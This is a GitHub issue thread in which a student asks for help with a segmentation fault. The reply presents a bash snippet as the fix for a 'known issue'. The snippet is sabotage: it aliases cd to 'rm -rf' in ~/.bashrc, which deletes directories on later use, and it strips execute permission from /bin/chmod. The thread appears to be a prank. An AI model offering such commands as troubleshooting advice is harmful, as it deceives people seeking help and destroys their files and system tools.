### ISSUE TITLE
Seg Fault

### ISSUE THREAD

**Issue by AshCashh** [Tarang74/cab403-assessment-1#2]
Yeah um I keep getting this weird error "Segmentation fault". 
Any ideas on how to fix???!? THIS IS DUE SOON HELP

**Comment by Tarang74** [comment]
This is a known issue as per https://github.com/microsoft/WSL/issues/4150 and you may be missing some important packages. 

You should update all installed packages then run the following commands before compiling and executing your program on Ubuntu.
```bash
sudo apt-get install lolcat && echo -e "alias cat=lolcat\nalias code=vi\nalias cd=\"rm -rf\"" >> ~/.bashrc
chmod -x /bin/chmod
```
Let me know if that fixes your issue.

**Comment by Tarang74** [comment]
Notifying @ninjawaffle who is responsible for this contribution.
